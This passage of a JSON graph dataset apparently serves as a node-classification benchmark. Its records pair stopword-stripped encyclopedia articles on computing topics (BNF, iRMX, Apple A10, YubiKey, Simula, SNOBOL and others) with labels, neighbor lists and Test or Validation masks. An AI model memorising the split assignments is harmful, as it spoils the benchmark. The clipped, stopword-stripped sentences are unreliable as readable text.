knuth argued bnf rather read backus–naur form normal form conventional sense unlike instance chomsky normal form name pāṇini backus form also suggested view fact expansion backus normal form may accurate pāṇini independently developed similar notation earlier bnf described peter naur algol 60 report metalinguistic formula another example algol 60 report illustrates major difference bnf metalanguage chomsky context-free grammar metalinguistic variables require rule defining formation formation may simply described natural language within brackets following algol 60 report section 2.3 comments specification exemplifies works purpose including text among symbols program following comment conventions hold equivalence meant three structures shown left column may replaced occurrence outside strings symbol shown line right column without effect action program naur changed two backus symbols commonly available characters := symbol originally ≡ symbol originally word bar expr := term expr addop term first symbol alternative may class defined repetition explained naur function specifying alternative sequence recursively begin previous alternative repeated number times example codice_3 defined codice_4 followed number codice_5 later metalanguages schorre meta ii bnf recursive repeat construct replaced sequence operator target language symbols defined using quoted strings codice_6 codice_7 bracket removed mathematical grouping codice_8 added codice_3 rule would appear meta ii expr term '+ term .out 'add '- term .out 'sub changes made meta ii derivative programming languages able define extend metalanguage ability use natural language description metalinguistic variable language construct description lost many spin-off metalanguages inspired bnf see meta ii tree-meta metacompiler bnf class describes language construct formation formation defined pattern action forming pattern class name expr described natural language codice_4 followed sequence codice_5 class abstraction talk independent formation talk term independent definition added subtracted expr talk term specific data type expr evaluated specific combinations data types even reordering expression group data types evaluation results mixed types natural-language supplement provided specific details language class semantics used compiler implementation programmer writing algol program natural-language description supplemented syntax well integer rule good example natural metalanguage used describe syntax integer := digit integer digit specifics white space far rule states could space digits natural language complement bnf metalanguage explaining digit sequence white space digits english one possible natural languages translations algol reports available many natural languages origin bnf important impact programming language development period immediately following publication algol 60 report bnf basis many compiler-compiler systems directly used bnf like syntax directed compiler algol 60 developed edgar t. irons compiler building system developed brooker morris others changed programming language schorre metacompilers made programming language changes codice_12 became symbol identifiers dropping enclosing using quoted strings symbols target language arithmetic like grouping provided simplification removed using classes grouping value meta ii arithmetic expression rule shows grouping use output expressions placed meta ii rule used output code labels assembly language rules meta ii equivalent class definitions bnf unix utility yacc based bnf code production similar meta ii yacc commonly used parser generator roots obviously bnf bnf today one oldest computer-related languages still use bnf specification set derivation rules written symbol nonterminal __expression__ consists one sequences symbols sequences separated vertical bar indicating choice whole possible substitution symbol left symbols never appear left side terminals hand symbols appear left side non-terminals always enclosed pair := means symbol left must replaced expression right example consider possible bnf u.s. postal address opt-suffix-part := sr. jr. roman-numeral translates english note many things format first-name apartment specifier zip-code roman numeral left unspecified necessary may described using additional bnf rules bnf syntax may represented bnf like following note empty string original bnf use quotes shown codice_13 rule assumes whitespace necessary proper interpretation rule codice_14 represents appropriate line-end specifier ascii carriage-return line-feed depending operating system codice_15 codice_16 substituted declared rule name/label literal text respectively u.s. postal address example entire block-quote syntax line unbroken grouping lines rule example one rule begins codice_17 part rule aside line-end expression consists two lists separated pipe codice_18 two lists consists terms three terms two terms respectively term particular rule rule-name many variants extensions bnf generally either sake simplicity succinctness adapt specific application one common feature many variants use regular expression repetition operators codice_19 codice_20 extended backus–naur form ebnf common one another common extension use square brackets around optional items although present original algol 60 report instead introduced years later ibm pl/i definition notation universally recognised augmented backus–naur form abnf routing backus–naur form rbnf extensions commonly used describe internet engineering task force ietf protocols parsing expression grammars build bnf regular expression notations form alternative class formal grammar essentially analytic rather generative character many bnf specifications found online today intended human-readable non-formal often include many following syntax rules extensions",
    "neighbors": [
      512,
      1672,
      2316,
      9871,
      1552,
      4635,
      1952,
      5792,
      8866,
      1956,
      3876,
      428,
      5677,
      10413,
      7983,
      8502,
      4919,
      1976,
      7612,
      2751,
      8262,
      10569,
      1610,
      8524,
      3277,
      9804,
      1490,
      8057,
      2650,
      1116,
      6753,
      3554,
      6242,
      9315,
      1769,
      10474,
      2798,
      9330,
      6521,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 10561,
    "label": 2,
    "text": "RMX_(operating_system):rmx operating system irmx real-time operating system designed specifically use intel 8080 intel 8086 family processors acronym real-time multitasking executive intel developed irmx 1970s originally released rmx/80 1976 rmx/86 1980 support create demand processors multibus system platforms functional specification rmx/86 authored bruce schafer miles lewitt completed summer 1978 soon intel relocated entire multibus business santa clara california aloha oregon schafer lewitt went manage one two teams developed rmx/86 product release schedule 1980 effective 2000 irmx supported maintained licensed worldwide tenasys corporation exclusive licensing arrangement intel irmx layered design containing kernel nucleus basic i/o system extended i/o system human interface installation need include components required intertask synchronization communication subsystems filesystem extended memory management command shell etc native filesystem specific irmx many similarities original unix v6 filesystem 14 character path name components file nodes sector lists application readable directories etc irmx supports multiple processes known jobs rmx parlance multiple threads supported within process task addition interrupt handlers threads exist run response hardware interrupts thus irmx multi-processing multi-threaded pre-emptive real-time operating system rtos following list commands supported irmx 86 several variations irmx developed since original introduction intel 8080 irmx ii iii irmx-86 irmx-286 dos-rmx irmx windows recently intime many original variants irmx still use irmx iii irmx windows intime currently supported development new real-time applications three supported variants irmx require intel 80386 equivalent higher processor run significant architectural difference intime rtos irmx variants support address segments see x86 memory segmentation original 8086 family processors relied heavily segment registers overcome limitations associated addressing large amounts memory via 16-bit registers irmx operating system compilers developed irmx include features exploit segmented addressing features original x86 architecture intime variant irmx include explicit support segmentation opting instead support simpler common 32-bit flat addressing scheme note despite fact native processes written intime operate using unsegmented flat-mode addressing possible port run older irmx applications use segmented addressing intime kernel intel introduced intel 80386 processor addition expanding irmx rtos support 32-bit registers irmx iii also included support four distinct protection rings named rings 0 3 describe protected-mode mechanism intel 32-bit architecture practice systems ever used rings 0 3 implement protection schemes ii iii -286 -86 variants intended standalone real-time operating systems number development utilities applications made irmx compilers pl/m fortran c editor aedit process data acquisition applications cross compilers hosted vax/vms system also made available intel irmx iii still supported today used core technology newer real-time virtualization rtos products including irmx windows intime irmx iii intel multibus hardware used majority core systems clscs london underground central line signals control system supplied westinghouse invensys commissioned late 1990s central line automatic train operation line automatic train protection trackside train borne equipment use irmx automatic train supervision elements use mix irmx multibus solaris sparc computers 16 irmx local site computers distributed along central line together 6 central irmx computers control centre 22 irmx computers dual redundant irmx clscs continues full operation oslo metro uses similar although less complex westinghouse-supplied irmx control system central common tunnel tracks expected decommissioned 2011 dos-rmx variant standalone irmx operating system designed allow two operating systems share single hardware platform simplest terms ms-dos irmx operate concurrently single ibm pc compatible computer irmx tasks processes scheduling priority dos kernel interrupts applications irmx events e.g. hardware interrupts pre-empt dos kernel ensure tasks respond real-time events time-deterministic manner functional sense dos-rmx predecessor irmx windows intime practice dos-rmx appears tsr ms-dos kernel loaded tsr irmx takes cpu changing protected mode running dos virtual machine within rmx task combination provides rmx real-time functionality well full ms-dos services like dos-rmx system provides hybrid mixture services capabilities defined ms-dos microsoft windows irmx inter-application communication via enhanced windows dde capability allows rmx tasks communicate windows processes irmx windows originally intended use combination 16-bit version microsoft windows 2002 irmx windows reintroduced adding rmx personalities intime rtos windows allowing used conjunction 32-bit protected-mode versions windows windows nt windows 2000 etc. like irmx predecessors intime real-time operating system like dos-rmx irmx windows runs concurrently general-purpose operating system single hardware platform intime 1.0 originally introduced 1997 conjunction windows nt operating system since upgraded include support subsequent protected-mode microsoft windows platforms including windows vista windows 7 intime also used stand-alone rtos intime binaries able run unchanged running stand-alone node intime rtos unlike windows intime run intel 80386 equivalent processor current versions windows operating system generally require least pentium level processor order boot execute introduction intime 3.0 included several important enhancements among support multi-core processors ability debug real-time processes intime kernel using microsoft visual studio intime smp operating system thus support multi-core processors restricted special form asymmetric multiprocessing used multi-core processor intime configured run one cpu core windows runs remaining processor core use cases viewed tenasys website",
    "neighbors": [
      2179,
      6276,
      10883,
      6797,
      8976,
      10001,
      9366,
      7319,
      2201,
      9628,
      3366,
      2345,
      10030,
      11383,
      6207,
      321,
      1221,
      9927,
      6985,
      9162,
      9166,
      6868,
      341,
      1750,
      9813,
      10590,
      1247,
      6624,
      5603,
      5220,
      1253,
      1126,
      6129,
      10482,
      3571,
      5492,
      1399,
      3960,
      2045,
      8831
    ],
    "mask": "None"
  },
  {
    "node_id": 10562,
    "label": 3,
    "text": "Apple_A10:apple a10 apple a10 fusion 64-bit arm-based system chip soc designed apple inc. manufactured tsmc first appeared iphone 7 7 plus introduced september 7 2016 addition a10 chip processor sixth-generation ipad seventh-generation ipod touch a10 first apple-designed quad-core soc two high-performance cores two energy-efficient cores apple states 40 greater cpu performance 50 greater graphics performance compared predecessor apple a9 a10 internally t8010 built tsmc 16 nm finfet process contains 3.3 billion transistors including gpu caches die size 125 mm features two apple-designed 64-bit 2.34 ghz armv8-a cores called hurricane die size 4.18 mm first apple-produced quad-core soc two high-performance cores designed demanding tasks like gaming also featuring two energy-efficient apple-designed 64-bit cores codenamed zephyr 0.78 mm normal tasks configuration similar arm big.little technology however unlike implementations big.little snapdragon 820 exynos 8890 one core type active time either high-performance low-power cores thus a10 fusion appears software benchmarks dual core chip apple claims high-performance cores 40 faster apple previous a9 processor two high-efficiency cores consume 20 power high performance hurricane cores used performing simple tasks checking email new performance controller decides realtime pair cores run given task order optimize performance battery life a10 l1 cache 64 kb data 64 kb instructions l2 cache 3 mb shared cores 4 mb l3 cache services entire soc new 6-core gpu built a10 chip 50 faster consuming 66 power a9 predecessor analysis suggested apple kept gt7600 used apple a9 replaced portions powervr based gpu proprietary designs changes appear using lower half-precision floating-point numbers allowing higher-performance lower power consumption embedded a10 m10 motion coprocessor a10 also includes new image processor apple says twice throughput prior image processor a10 adds hardware encoding heif hevc a10 packaged new info packaging tsmc reduces height package package also four lpddr4 ram chips integrating 2 gb ram iphone 7 ipad 6th generation ipod touch 7th generation 3 gb iphone 7 plus",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      9235,
      11282,
      6165,
      11289,
      7706,
      8222,
      1057,
      2551,
      38,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      8237,
      9774,
      2097,
      1074,
      8754,
      9784,
      8250,
      8253,
      576,
      7745,
      1090,
      7747,
      2635,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      99,
      8806,
      3691,
      8812,
      2673,
      6258,
      10357,
      6264,
      10361,
      4220,
      7292,
      2686,
      638,
      6783,
      7806,
      10365,
      10878,
      644,
      4741,
      8842,
      6283,
      7824,
      146,
      147,
      659,
      7830,
      6807,
      5784,
      1177,
      666,
      4251,
      3228,
      5786,
      7833,
      2207,
      4258,
      7842,
      7844,
      4773,
      11430,
      171,
      2735,
      3248,
      9913,
      4283,
      3772,
      7869,
      8893,
      8383,
      8896,
      10945,
      6654,
      4807,
      4810,
      3790,
      1744,
      4821,
      3286,
      9430,
      3293,
      4318,
      9952,
      2788,
      3301,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      9964,
      1776,
      10481,
      6391,
      3835,
      2814,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      10023,
      5417,
      810,
      2862,
      4399,
      4910,
      7988,
      11062,
      7991,
      11066,
      2363,
      6971,
      2365,
      2366,
      9022,
      11257,
      1346,
      8003,
      6981,
      838,
      7496,
      5963,
      8525,
      1871,
      1872,
      9042,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      1377,
      9063,
      10602,
      3948,
      11629,
      10608,
      6001,
      373,
      8058,
      9084,
      7549,
      11649,
      2439,
      392,
      3977,
      6023,
      6539,
      7052,
      398,
      1428,
      3483,
      4508,
      2979,
      5028,
      7077,
      9123,
      9638,
      8109,
      3511,
      2492,
      446,
      7614,
      5058,
      9155,
      10691,
      2502,
      456,
      1482,
      9163,
      7118,
      7631,
      464,
      6608,
      980,
      9685,
      8662,
      9174,
      10199,
      8665,
      2524,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      10734,
      5616,
      6130,
      7154,
      1014,
      3575,
      2553,
      8700,
      1534
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10563,
    "label": 3,
    "text": "Arcus_II:_Silent_Symphony:arcus ii silent symphony",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 10564,
    "label": 2,
    "text": "TRSDOS:trsdos trsdos stood tandy radio shack disk operating system operating system tandy trs-80 line 8-bit zilog z80 microcomputers sold radio shack late 1970s early 1980s tandy manuals recommended pronounced triss-doss trsdos confused tandy dos version ms-dos licensed microsoft tandy x86 line personal computers pcs original trs-80 model 1977 trsdos primarily way extending mbasic basic rom additional i/o input/output commands worked disk files rather cassette tapes used non-disk model systems later disk-equipped model iii computers used completely different version trsdos radio shack culminated 1981 trsdos version 1.3 1983 disk-equipped trs-80 model 4 computers used trsdos version 6 development model iii ldos logical systems inc last updated 1987 released ls-dos 6.3 completely unrelated version trsdos radio shack trs-80 model ii professional computer 1979 also based z80 equipped 8 inch disk drives later machines line models 12 16 6000 used z80 alternate cpu main motorola 68000 chip could run version trsdos backwards compatibility older z80 applications software model trsdos supports four floppy mini-diskette drives use 5¼-inch diskettes capacity 89kb later 160kb formatted double-density sectors versions trsdos models 4 ii support double-density double sided floppy diskettes formatted 80 tracks per side including 3.5 inch microfloppy drives available 1985 drives numbered 0 3 system diskettes contain trsdos code utilities present drive 0 times trsdos uses overlays satisfy system requests disk directories maintained memory tandy corporation trs-80 microcomputer disk drive disk operating system release first version trsdos randy cook buggy others wrote alternatives including newdos ldos disputes cook ownership source code tandy hired logical systems ldos developer continue trsdos development trsdos 6 shipped trs-80 model 4 1983 identical ldos 6.00 typical trsdos utilities although ms-dos owes heritage closely cp/m thence tops-10 many file manipulation commands similar trsdos comparison cp/m command copying files called pip pun pip printers chain copy centers era acronym standing peripheral interchange program",
    "neighbors": [
      3841,
      2179,
      1804,
      6797,
      6675,
      10387,
      5397,
      2198,
      8729,
      7983,
      823,
      7483,
      6459,
      965,
      9166,
      1750,
      7269,
      6120,
      5359,
      8306,
      499,
      5363,
      2933,
      5492
    ],
    "mask": "Test"
  },
  {
    "node_id": 10565,
    "label": 7,
    "text": "Tarantool:tarantool tarantool open-source nosql database management system lua application server maintains databases memory ensures crash resistance write-ahead logging includes lua interpreter interactive console also accepts connections programs several languages mail.ru one largest internet companies russia started project 2008 part development moy mir world social network 2010 project head hired former technical lead mysql open-source contributors active especially area external-language connectors c perl php python ruby node.js tarantool became part mail.ru backbone used dynamic content user sessions unsent instant messages task queues caching layer traditional relational databases mysql postgresql 2014 tarantool also adopted social network services badoo odnoklassniki latter affiliated mail.ru since 2010 june 2014 researchers polytechnic institute coimbra university coimbra portugal conducted first formal independent performance test nosql systems included tarantool tests used standard ycsb benchmark nosql systems cassandra hbase oracle nosql redis voldemort scalaris elasticsearch mongodb orientdb data maintained memory ram data persistence ensured write-ahead logging snapshotting reasons industry observers compared tarantool membase replication asynchronous failover getting one tarantool server take another possible either replica server hot standby server locks tarantool uses lua-style coroutines asynchronous i/o result application programs stored procedures must written cooperative multitasking mind rather popular preemptive multitasking database storage basic unit tuple tuples tuple sets handle role rows tables relational databases tuples arbitrary number fields fields need names every tuple database one unique null primary key one secondary keys enabled immediate lookup via indexes supported index types binary tree hash bitmap r-tree spatial fields tuple type-agnostic specific numeric string data types users may insert update delete select granted appropriate privileges tarantool 2017 introduced optional on-disk storage engine allows databases larger memory size tarantool 2019 introduced optional sql interface complies mandatory features official sql standard tarantool comes part official distributions linux distros debian fedora ubuntu tarantool organization also supplies downloads linux distributions os x freebsd tarantool extended modules installed using luarocks includes selection extension rocks",
    "neighbors": [
      2051,
      8582,
      9245,
      6433,
      4777,
      4781,
      10413,
      7983,
      7347,
      5047,
      823,
      6458,
      11326,
      8644,
      4186,
      860,
      9320,
      8554,
      7022,
      4598,
      6522,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10566,
    "label": 4,
    "text": "YubiKey:yubikey yubikey hardware authentication device manufactured yubico supports one-time passwords public-key encryption authentication universal 2nd factor u2f fido2 protocols developed fido alliance allows users securely log accounts emitting one-time passwords using fido-based public/private key pair generated device yubikey also allows storing static passwords use sites support one-time passwords facebook uses yubikey employee credentials google supports employees users password managers support yubikey yubico also manufactures security key device similar yubikey focused public-key authentication yubikey implements hmac-based one-time password algorithm hotp time-based one-time password algorithm totp identifies keyboard delivers one-time password usb hid protocol yubikey neo yubikey 4 include protocols openpgp card using 2048-bit rsa elliptic curve cryptography ecc p256 p384 near field communication nfc fido u2f yubikey allows users sign encrypt decrypt messages without exposing private keys outside world 4th generation yubikey launched november 16 2015 support openpgp 4096-bit rsa keys pkcs 11 support piv smart cards feature allows code signing docker images founded 2007 ceo stina ehrensvärd yubico private company offices palo alto seattle stockholm yubico cto jakob ehrensvärd lead author original strong authentication specification became known universal 2nd factor u2f yubico founded 2007 began offering pilot box developers november year original yubikey product shown annual rsa conference april 2008 robust yubikey ii model launched 2009 yubikey ii later models two slots available storing two distinct configurations separate aes secrets settings authenticating first slot used briefly pressing button device second slot gets used holding button 2 5 seconds 2010 yubico began offering yubikey oath yubikey rfid models yubikey oath added ability generate 6- 8-character one-time passwords using protocols initiative open authentication oath addition 32-character passwords used yubico otp authentication scheme yubikey rfid model included oath capability plus also included mifare classic 1k radio-frequency identification chip though separate device within package could configured normal yubico software usb connection yubico announced yubikey nano february 2012 miniaturized version standard yubikey designed would fit almost entirely inside usb port expose small touch pad button later models yubikey also available standard nano sizes 2012 also saw introduction yubikey neo improved upon previous yubikey rfid product implementing near-field communication nfc technology integrating usb side device yubikey neo neo-n nano version device able transmit one-time passwords nfc readers part configurable url contained nfc data exchange format ndef message neo also able communicate using ccid smart-card protocol addition usb hid human interface device keyboard emulation ccid mode used piv smart card openpgp support usb hid used one-time password authentication schemes 2014 yubikey neo updated fido universal 2nd factor u2f support later year yubico released fido u2f security key specifically included u2f support none one-time password static password smart card nfc features previous yubikeys launch correspondingly sold lower price point 18 compared 25 yubikey standard 40 nano version 50 yubikey neo 60 neo-n pre-release devices issued google fido/u2f development reported yubico winusb gnubby gnubby1 april 2015 company launched yubikey edge standard nano form factors slotted neo fido u2f products feature-wise designed handle otp u2f authentication include smart card nfc support yubikey 4 family devices first launched november 2015 usb-a models standard nano sizes yubikey 4 includes features yubikey neo including increasing allowed openpgp key size 4096 bits vs. previous 2048 dropped nfc capability neo ces 2017 yubico announced expansion yubikey 4 series support new usb-c design yubikey 4c released february 13 2017 android os usb-c connection one-time password feature supported android os yubikey features currently supported including universal 2nd factor u2f 4c nano version became available september 2017 april 2018 company brought security key yubico first device implement new fido2 authentication protocols webauthn reached w3c candidate recommendation status march client authenticator protocol ctap still development may 2018 launch device available standard form factor usb-a connector like previous fido u2f security key blue color uses key icon button distinguished number 2 etched plastic button keyring hole also less expensive yubikey neo yubikey 4 models costing 20 per unit launch lacks otp smart card features previous devices though retains fido u2f capability used one-time passwords stored static passwords yubikey emits characters using modified hexadecimal alphabet intended independent system keyboard settings possible alphabet referred modhex modified hexadecimal consists characters cbdefghijklnrtuv corresponding hexadecimal digits 0123456789abcdef due yubikeys using raw keyboard scan codes usb hid mode problems using devices computers set different keyboard layouts dvorak recommended either use operating system features temporarily switch standard us keyboard layout similar using one-time passwords although yubikey neo later devices configured alternate scan codes match layouts n't compatible modhex character set u2f authentication yubikeys security keys bypasses problem using alternate u2fhid protocol sends receives raw binary messages instead keyboard scan codes ccid mode acts smart card reader use hid protocols yubico replaced open-source components yubikey 4 closed-source code longer independently reviewed security flaws yubico states internal external review code done yubikey neos still using open-source code may 16 2016 yubico cto jakob ehrensvärd responded open-source community concerns blog post affirming company strong open source support addressing reasons benefits updates yubikey 4 october 2017 security researchers found vulnerability known roca implementation rsa keypair generation cryptographic library used large number infineon security chips vulnerability allows attacker reconstruct private key using public key yubikey 4 yubikey 4c yubikey 4 nano devices within revisions 4.2.6 4.3.4 affected vulnerability yubico remedied issue shipping yubikey 4 devices switching different key generation function offered free replacements affected keys replacement offer ended march 31 2019 cases issue bypassed generating new keys outside yubikey importing onto device june 2019 yubico released security advisory reporting reduced randomness fips-certified devices shortly power-up company offered free replacements affected keys",
    "neighbors": [
      32,
      11584,
      2050,
      8674,
      4644,
      3271,
      6316,
      3309,
      7212,
      5918,
      10801,
      1054,
      2910,
      4575
    ],
    "mask": "Test"
  },
  {
    "node_id": 10567,
    "label": 4,
    "text": "Code_wheel:code wheel code wheel type copy protection used older computer games often published late 1980s early 1990s evolved original manual protection system program would require user enter specific word manual game would start continue beyond certain point system popular allowed actual media backed replaced freely retaining security increased availability photocopiers wishing distribute games simply started copying manuals well defeat measure although whole code wheels could directly photocopied component wheels could disassembled individually photocopied components could crafted together duplicate wheel contents code wheels could also copied onto paper user unlicensed copy could simply apply mathematical formula presented challenges calculate correct response suitable formula found code wheels actually made process copying easier since amount information could contain low compared manual potentially unlimited size thus code wheels rapidly phased favor regular manual protection protection based around color public access color photocopying time expensive uncommon made obsolete return protection based game media cd-roms introduced code wheel physical object consisting several circular sheets paper card different sizes fastened center creating set concentric circles game issues user set challenges symbols words identifiers instruct user manipulate wheel order reveal response single symbol word user must enter order start game entering anything expected response would result game halting performing behaviour associated unauthorised usage software example game starflight would send unbeatable police ships destroy player spaceship simple 2-ply code wheel consisted two circular sheets challenge symbols printed intervals around rim back sheet containing table responses printed fit circle front sheet series holes allowing responses viewed hole labelled challenge symbol computer would present three challenge symbols user would read response rotating front sheet first two challenge symbols aligned rim wheel read response hole indicated third challenge symbol type codewheel used large number games neuromancer cybercon 3 used code wheel printed carbon paper one usage single-ply code wheel two challenge symbols used amiga game rocket ranger player turned wheel match ranger current location read value hole corresponding location wanted fly holes simple column since mechanism player specify wanted fly impossible crackers remove game without destroying entire gameplay 3-ply code wheel used games star control fool errand retained back wheel printed responses front wheel holes added middle wheels front back contained mixture printed responses holes allowed next wheel show particular challenge symbols aligned interactive code wheels online oldgames.sk",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 10568,
    "label": 9,
    "text": "Simula:simula simula name two simulation programming languages simula simula 67 developed 1960s norwegian computing center oslo ole-johan dahl kristen nygaard syntactically fairly faithful superset algol 60 also influenced design simscript simula 67 introduced objects classes inheritance subclasses virtual procedures coroutines discrete event simulation features garbage collection also forms subtyping besides inheriting subclasses introduced simula derivatives simula considered first object-oriented programming language name suggests simula designed simulations needs domain provided framework many features object-oriented languages today simula used wide range applications simulating vlsi designs process modeling protocols algorithms applications typesetting computer graphics education influence simula often understated simula-type objects reimplemented c++ object pascal java c several languages computer scientists bjarne stroustrup creator c++ james gosling creator java acknowledged simula major influence following account based jan rune holmevik historical essay kristen nygaard started writing computer simulation programs 1957 nygaard saw need better way describe heterogeneity operation system go ideas formal computer language describing system nygaard realized needed someone computer programming skills ole-johan dahl joined work january 1962 decision linking language algol 60 made shortly may 1962 main concepts simulation language set simula born special purpose programming language simulating discrete event systems kristen nygaard invited visit eckert–mauchly computer corporation late may 1962 connection marketing new univac 1107 computer visit nygaard presented ideas simula robert bemer director systems programming univac bemer sworn algol fan found simula project compelling bemer also chairing session second international conference information processing hosted ifip invited nygaard presented paper simula -- extension algol description discrete-event networks norwegian computing center got univac 1107 august 1963 considerable discount dahl implemented simula contract univac implementation based univac algol 60 compiler simula fully operational univac 1107 january 1965 following couple years dahl nygaard spent lot time teaching simula simula spread several countries around world simula later implemented burroughs b5500 computers russian ural-16 computer 1966 c. a. r. hoare introduced concept record class construct dahl nygaard extended concept prefixing features meet requirements generalized process concept dahl nygaard presented paper class subclass declarations ifip working conference simulation languages oslo may 1967 paper became first formal definition simula 67 june 1967 conference held standardize language initiate number implementations dahl proposed unify type class concept led serious discussions proposal rejected board simula 67 formally standardized first meeting simula standards group ssg february 1968 simula influential development smalltalk later object-oriented programming languages also helped inspire actor model concurrent computation although simula supports coroutines true concurrency late sixties early seventies four main implementations simula implementations ported wide range platforms tops-10 implemented concept public protected private member variables procedures later integrated simula 87 simula 87 latest standard ported wide range platforms mainly four implementations november 2001 dahl nygaard awarded ieee john von neumann medal institute electrical electronics engineers introduction concepts underlying object-oriented programming design implementation simula 67 april 2002 received 2001 a. m. turing award association computing machinery acm citation ideas fundamental emergence object oriented programming design programming languages simula simula 67 unfortunately neither dahl nygaard could make acm turing award lecture scheduled delivered november 2002 oopsla conference seattle died june august year respectively simula research laboratory research institute named simula language nygaard held part-time position opening 2001 new computer science building university oslo named ole johan dahl house dahl honour main auditorium named simula empty computer file minimal program simula measured size source code consists one thing dummy statement however minimal program conveniently represented empty block begins executing immediately terminates language return value program example hello world program simula simula case-insensitive realistic example use classes subclasses virtual procedures example one super class glyph two subclasses char line one virtual procedure two implementations execution starts executing main program simula concept abstract classes since classes pure virtual procedures instantiated means example classes instantiated calling pure virtual procedure however produce run-time error simula supports call name jensen device easily implemented however default transmission mode simple parameter call value contrary algol used call name source code jensen device must therefore specify call name parameters compiled simula compiler another much simpler example summation function formula_1 implemented follows code uses call name controlling variable k expression u allows controlling variable used expression note simula standard allows certain restrictions controlling variable loop code therefore uses loop maximum portability following formula_2 implemented follows simula includes simulation package discrete event simulations simulation package based simula object oriented features coroutine concept sam sally andy shopping clothes share one fitting room one browsing store 12 minutes uses fitting room exclusively three minutes following normal distribution simulation fitting room experience follows main block prefixed codice_1 enabling simulation simulation package used block simulations even nested simulating someone simulations fitting room object uses queue codice_2 getting access fitting room someone requests fitting room use must wait queue codice_3 someone leaves fitting room first one released queue codice_4 accordingly removed door queue codice_5 person subclass process activity described using hold time browsing store time spent fitting room calls procedures fitting room object requesting leaving fitting room main program creates objects activates person objects put event queue main program holds 100 minutes simulated time program terminates",
    "neighbors": [
      512,
      2304,
      2432,
      9345,
      4998,
      1804,
      4877,
      10764,
      5775,
      6160,
      9871,
      5397,
      1952,
      10145,
      11555,
      1702,
      10617,
      5677,
      7983,
      9264,
      2482,
      10547,
      11574,
      2617,
      7612,
      963,
      10819,
      8262,
      3529,
      1610,
      1611,
      8524,
      5584,
      5585,
      11219,
      1236,
      4069,
      10470,
      6248,
      4201,
      11242,
      2283,
      9330,
      2804,
      8057,
      2556,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 10569,
    "label": 9,
    "text": "SNOBOL:snobol snobol string oriented symbolic language series computer programming languages developed 1962 1967 bell laboratories david j. farber ralph e. griswold ivan p. polonsky culminating snobol4 one number text-string-oriented languages developed 1950s 1960s others included comit trac snobol4 stands apart programming languages era patterns first-class data type i.e data type whose values manipulated ways permitted data type programming language providing operators pattern concatenation alternation later object-oriented languages javascript patterns type object admit various manipulations strings generated execution treated programs executed eval function languages snobol4 quite widely taught larger us universities late 1960s early 1970s widely used 1970s 1980s text manipulation language humanities 1980s 1990s use faded newer languages awk perl made string manipulation means regular expressions fashionable snobol4 patterns subsume bnf grammars equivalent context-free grammars powerful regular expressions regular expressions current versions awk perl fact extensions regular expressions traditional sense regular expressions unlike snobol4 patterns recursive gives distinct computational advantage snobol4 patterns recursive expressions appear perl 5.10 though released december 2007 one designers snobol ralph griswold designed successors snobol4 called sl5 icon combined backtracking snobol4 pattern matching standard algol-like structuring well adding features initial snobol language created tool used authors work symbolic manipulation polynomials written assembly language ibm 7090 simple syntax one datatype string functions declarations little error control however despite simplicity personal nature use began spread groups result authors decided extend tidy rewrote added functions standard user-defined released result snobol3 snobol2 exist short-lived intermediate development version without user-defined functions never released snobol3 became quite popular rewritten computers ibm 7090 programmers result several incompatible dialects arose snobol3 became popular authors received requests extensions language also began receive complaints incompatibility bugs versions n't written address take advantage new computers introduced late 1960s decision taken develop snobol4 many extra datatypes features based virtual machine allow improved portability across computers snobol4 language translator still written assembly language however macro features assembler used define virtual machine instructions snobol implementation language sil much improved portability language making relatively easy port virtual machine hosted translator recreating virtual instructions machine included macro assembler indeed high level language snobol4 supports number built-in data types integers limited precision real numbers strings patterns arrays tables associative arrays also allows programmer define additional data types new functions snobol4 programmer-defined data type facility advanced time—it similar earlier cobol later pascal records snobol command lines form five elements optional general subject matched pattern object present matched portion replaced object via rules replacement transfer absolute branch conditional branch dependent upon success failure subject evaluation pattern evaluation pattern match object evaluation final assignment also transfer code created compiled program run snobol pattern simple extremely complex simple pattern text string e.g abcd complex pattern may large structure describing example complete grammar computer language possible implement language interpreter snobol almost directly backus–naur form expression changes creating macro assembler interpreter completely theoretical piece hardware could take little hundred lines new instruction added single line complex snobol patterns things would impractical impossible using primitive regular expressions used pattern matching languages power derives so-called spitbol extensions since incorporated basically modern implementations original snobol 4 language although possible achieve power without part power comes side effects possible produce pattern matching operation including saving numerous intermediate/tentative matching results ability invoke user-written functions pattern match perform nearly desired processing influence ongoing direction interrupted pattern match takes even indeed change pattern matching operation patterns saved like first-class data item concatenated used within patterns used create complex sophisticated pattern expressions possible write example snobol4 pattern matches complete name international postal mailing address well beyond anything practical even attempt using regular expressions snobol4 pattern-matching uses backtracking algorithm similar used logic programming language prolog provides pattern-like constructs via dcgs algorithm makes easier use snobol logic programming language case languages snobol stores variables strings data structures single garbage-collected heap snobol rivals apl distinctiveness format programming style radically unlike standard procedural languages basic fortran c. hello world program might follows ... end simple program ask user name use output sentence ... end choose three possible outputs ... meh output hi username end love output nice meet username end hate output oh username end continue requesting input forthcoming ... namecount namecount 1 getinput output please give name namecount 1 end classic implementation pdp-10 used study compilers formal grammars artificial intelligence especially machine translation machine comprehension natural languages original implementation ibm 7090 bell labs holmdel n.j. snobol4 specifically designed portability first implementation started ibm 7094 1966 completed ibm 360 1967 rapidly ported many platforms normally implemented interpreter difficulty implementing high-level features compiler spitbol compiler provides nearly facilities interpreter provides gnat ada compiler comes package gnat.spitbol implements spitbol string manipulation semantics called within ada program file editor michigan terminal system mts provided pattern matching based snobol4 patterns several implementations currently available macro snobol4 c written phil budne free open source implementation capable running almost platform catspaw inc provided commercial implementation snobol4 language many different computer platforms including dos macintosh sun rs/6000 others implementations available free catspaw minnesota snobol4 viktors berstis closest pc implementation original ibm mainframe version even including fortran-like format statement support also free although snobol structured programming features snobol preprocessor called snostorm designed implemented 1970s fred g. swartz use michigan terminal system mts university michigan snostorm 